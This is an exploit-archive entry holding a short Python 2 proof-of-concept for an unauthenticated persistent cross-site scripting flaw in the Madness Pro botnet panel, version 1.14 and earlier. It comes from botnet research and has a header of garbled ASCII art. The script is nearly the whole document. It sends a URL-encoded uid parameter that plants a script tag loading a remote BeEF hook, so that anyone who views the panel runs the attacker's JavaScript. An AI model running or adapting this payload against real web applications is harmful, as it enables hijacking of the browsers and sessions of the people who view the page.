Madness Pro <= 1.14 - Persistent XSS
2014-06-06 14:05:03#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# Exploit Title: Madness Pro <= 1.14 Persistent XSS
# Date: June 05, 2014
# Exploit Author: @botnet_hunter
# Version: 1.14
# Tested on: Apache2 - Ubuntu - MySQL
# â��â��â�� â��â��â��â��· â��â��â��â��â�� • â�� â�� ·. â��· â��â��
# â��â��• â�ª â��â�� â��â��â�ªâ�ª •â��â�� â�ª ·â��â�� â��â��â��â��â�ªâ��â��â�ªâ��â��â��
# â��â��â�ª â��â��â��â�� â��â��â��â��â��â�� â��â��â��â�� â��â��.â�ª â��â��â��â�� â��â�� â��â��â��â��â��·â��â��â��â��â��â�ª
# â��â��â��â��â��â��â��â��.â��â��â��â��â��â�ªâ��â��â��â��â��.â��â�� â��â��â��·â��â��â��.â��â��â��â�� â��â��â��â��â��â�� â��â��â��·.
# .â��â��â�� â��â��â��â��â�ª·â��â��â��â�� â��â��â��â��â�ª â��â��â�� â��â��â��â��â�ªâ��â�� â��â�ªâ��â��â�� â�� •
# â��â��· â��• â��â��â��â��â�� â�ª â�� â�� â��â�� • • â�� â�� ·. â��â��â��· ·â��â��â��â�� â�� â�� â��â��â�� ..â��â�� · .â��â�� ·
# â��â�� â��â�ªâ��â�ªâ��â��â��â��â�� â��·â��â�� •â��â��â��â��â��â�� â�� â�ª ·â��â�� â��â��â��â��â�ªâ��â�� â��â�� â��â��â�ª â��â�� •â��â��â��â��â��â��.â��·â��â�� â��. â��â�� â��.
# â��â�� â��â��â��â��â��â��â��â��â��â��â�� â��â��·â��â��â��â��â��â��â�� â��â��â�� â��â�� â��â��â��â��â��·â��â��â��â��â�� â��â��· â��â��â��â��â��â��â��â��â��â��â��â�ªâ��â��â��â��â��â��â��â��â��â��â��â��â��
# â��â��â��â��â��â��â��â��â��â��â��â��•â��â��â��â��â��â��â��â��â��â��â��â��â��â�ªâ��â�� â��â�� â��â��â��â��â��â��â��â�� â�ªâ��â��â��â��. â��â�� â��â��â��â��â��â��â��â��â��â��â��â��â��â�ªâ��â��â��â��â��â�ªâ��â��
# ·â��â��â�� â��â��â�� .â�� â��â��â��â��â��â�� â��â�ª·â��â��â��â�� â��â�� â��â�ªâ��â��â�� â�� â�� â��â��â��â��â��• â��â�� â��â�ª â��â��â�� â��â��â��â�� â��â��â��â��
#
# Unauthenticated persistent XSS in Madness Pro panel <= 1.14
# Discovered and developed by bwall @botnet_hunter
#
# References:
# http://blog.cylance.com/a-study-in-bots-lobotomy
#
import urllib
# Fill in URL that Madness Pro bot connects back to
panel_url = ""
# Fill in URL to your Javascript payload (the shorter the better)
beef_hook = ""
def install_beef_hook(beef_hook_url, panel_index_url):
f = urllib.urlopen("{0}?uid=12345%3Cimg%20alt%3D\\')%3B%5C%22%3E%3Cscript%20src=\"{1}\">%3C%2Fscript%3E%3C%2Fa%3E"
"%3Ca%20href%3D%22%23%22%20onclick%3D%5C%22set_status(\\'12345".format(panel_index_url,
beef_hook_url))
print f.read()
install_beef_hook(beef_hook, panel_url)
Fixes
No fixesIn order to submit a new fix you need to be registered.